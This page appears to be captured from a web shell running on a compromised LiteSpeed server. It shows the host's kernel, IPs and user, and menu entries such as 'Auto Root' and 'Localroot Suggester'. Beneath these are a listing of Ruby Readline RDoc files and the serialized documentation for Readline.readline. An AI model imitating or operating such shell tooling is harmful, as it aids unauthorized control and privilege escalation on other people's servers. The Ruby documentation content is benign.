Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby26 /
share /
ri /
2.6.0 /
system /
Readline /
Delete
Unzip
Name
Size
Permission
Date
Action
basic_quote_characters%3d-c.ri
540
B
-rw-r--r--
2023-07-26 18:33
basic_quote_characters-c.ri
537
B
-rw-r--r--
2023-07-26 18:33
basic_word_break_characters%3d-c.ri
699
B
-rw-r--r--
2023-07-26 18:33
basic_word_break_characters-c.ri
592
B
-rw-r--r--
2023-07-26 18:33
cdesc-Readline.ri
3.68
KB
-rw-r--r--
2023-07-26 18:33
completer_quote_characters%3d-c.ri
776
B
-rw-r--r--
2023-07-26 18:33
completer_quote_characters-c.ri
572
B
-rw-r--r--
2023-07-26 18:33
completer_word_break_characters%3d-c.ri
681
B
-rw-r--r--
2023-07-26 18:33
completer_word_break_characters-c.ri
605
B
-rw-r--r--
2023-07-26 18:33
completion_append_character%3d-c.ri
1.31
KB
-rw-r--r--
2023-07-26 18:33
completion_append_character-c.ri
595
B
-rw-r--r--
2023-07-26 18:33
completion_case_fold%3d-c.ri
404
B
-rw-r--r--
2023-07-26 18:33
completion_case_fold-c.ri
750
B
-rw-r--r--
2023-07-26 18:33
completion_proc%3d-c.ri
2.7
KB
-rw-r--r--
2023-07-26 18:33
completion_proc-c.ri
372
B
-rw-r--r--
2023-07-26 18:33
completion_quote_character-c.ri
802
B
-rw-r--r--
2023-07-26 18:33
delete_text-c.ri
676
B
-rw-r--r--
2023-07-26 18:33
emacs_editing_mode%3f-c.ri
524
B
-rw-r--r--
2023-07-26 18:33
emacs_editing_mode-c.ri
589
B
-rw-r--r--
2023-07-26 18:33
filename_quote_characters%3d-c.ri
634
B
-rw-r--r--
2023-07-26 18:33
filename_quote_characters-c.ri
611
B
-rw-r--r--
2023-07-26 18:33
get_screen_size-c.ri
568
B
-rw-r--r--
2023-07-26 18:33
input%3d-c.ri
400
B
-rw-r--r--
2023-07-26 18:33
insert_text-c.ri
568
B
-rw-r--r--
2023-07-26 18:33
line_buffer-c.ri
696
B
-rw-r--r--
2023-07-26 18:33
output%3d-c.ri
406
B
-rw-r--r--
2023-07-26 18:33
point%3d-c.ri
541
B
-rw-r--r--
2023-07-26 18:33
point-c.ri
814
B
-rw-r--r--
2023-07-26 18:33
pre_input_hook%3d-c.ri
750
B
-rw-r--r--
2023-07-26 18:33
pre_input_hook-c.ri
618
B
-rw-r--r--
2023-07-26 18:33
quoting_detection_proc%3d-c.ri
1.24
KB
-rw-r--r--
2023-07-26 18:33
quoting_detection_proc-c.ri
400
B
-rw-r--r--
2023-07-26 18:33
readline-c.ri
2.81
KB
-rw-r--r--
2023-07-26 18:33
redisplay-c.ri
570
B
-rw-r--r--
2023-07-26 18:33
refresh_line-c.ri
356
B
-rw-r--r--
2023-07-26 18:33
set_screen_size-c.ri
580
B
-rw-r--r--
2023-07-26 18:33
special_prefixes%3d-c.ri
858
B
-rw-r--r--
2023-07-26 18:33
special_prefixes-c.ri
669
B
-rw-r--r--
2023-07-26 18:33
vi_editing_mode%3f-c.ri
512
B
-rw-r--r--
2023-07-26 18:33
vi_editing_mode-c.ri
548
B
-rw-r--r--
2023-07-26 18:33
Save
Rename
U:RDoc::AnyMethod[iI" readline:ETI"Readline::readline;TT:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"GShows the +prompt+ and reads the inputted line with line editing. ;TI"EThe inputted line is added to the history if +add_hist+ is true.;To:RDoc::Markup::BlankLine o; ; [I"EReturns nil when the inputted line is empty and user inputs EOF ;TI"(Presses ^D on UNIX).;T@o; ; [I"GRaises IOError exception if one of below conditions are satisfied.;To:RDoc::Markup::List: @type:NUMBER:@items[o:RDoc::Markup::ListItem:@label0; [o; ; [I"stdin was closed.;To;;0; [o; ; [I"stdout was closed.;T@o; ; [I"IThis method supports thread. Switches the thread context when waits ;TI"inputting line.;T@o; ; [I"NSupports line edit when inputs line. Provides VI and Emacs editing mode. ;TI"#Default is Emacs editing mode.;T@o; ; [I"HNOTE: Terminates ruby interpreter and does not return the terminal ;TI">status after user pressed '^C' when wait inputting line. ;TI"#Give 3 examples that avoid it.;T@o;; :BULLET;[o;;0; [o; ; [I"ACatches the Interrupt exception by pressed ^C after returns ;TI"terminal status:;T@o:RDoc::Markup::Verbatim; [I"require "readline" ;TI" ;TI"!stty_save = `stty -g`.chomp ;TI"begin ;TI"% while buf = Readline.readline ;TI" p buf ;TI" end ;TI" rescue Interrupt ;TI"% system("stty", stty_save) ;TI" exit ;TI" end ;TI" end ;TI" end ;T:@format0o;;0; [o; ; [I"ACatches the INT signal by pressed ^C after returns terminal ;TI"status:;T@o;; [ I"require "readline" ;TI" ;TI"!stty_save = `stty -g`.chomp ;TI"4trap("INT") { system "stty", stty_save; exit } ;TI" ;TI"#while buf = Readline.readline ;TI" p buf ;TI" end ;T;0o;;0; [o; ; [I"Ignores pressing ^C:;T@o;; [I"require "readline" ;TI" ;TI"trap("INT", "SIG_IGN") ;TI" ;TI"#while buf = Readline.readline ;TI" p buf ;TI" end ;T;0o; ; [I":Can make as follows with Readline::HISTORY constant. ;TI"HIt does not record to the history if the inputted line is empty or ;TI"the same it as last one.;T@o;; [I"require "readline" ;TI" ;TI"/while buf = Readline.readline("> ", true) ;TI"" # p Readline::HISTORY.to_a ;TI"/ Readline::HISTORY.pop if /^\s*$/ =~ buf ;TI" ;TI" begin ;TI"A if Readline::HISTORY[Readline::HISTORY.length-2] == buf ;TI"! Readline::HISTORY.pop ;TI" end ;TI" rescue IndexError ;TI" end ;TI" ;TI"" # p Readline::HISTORY.to_a ;TI" print "-> ", buf, "\n" ;TI"end;T;0: @fileI"ext/readline/readline.c;T:0@omit_headings_from_table_of_contents_below0I"GReadline.readline(prompt = "", add_hist = false) -> string or nil ;T0[ I"(p1 = v1, p2 = v2);T@|FI" Readline;TcRDoc::NormalModule00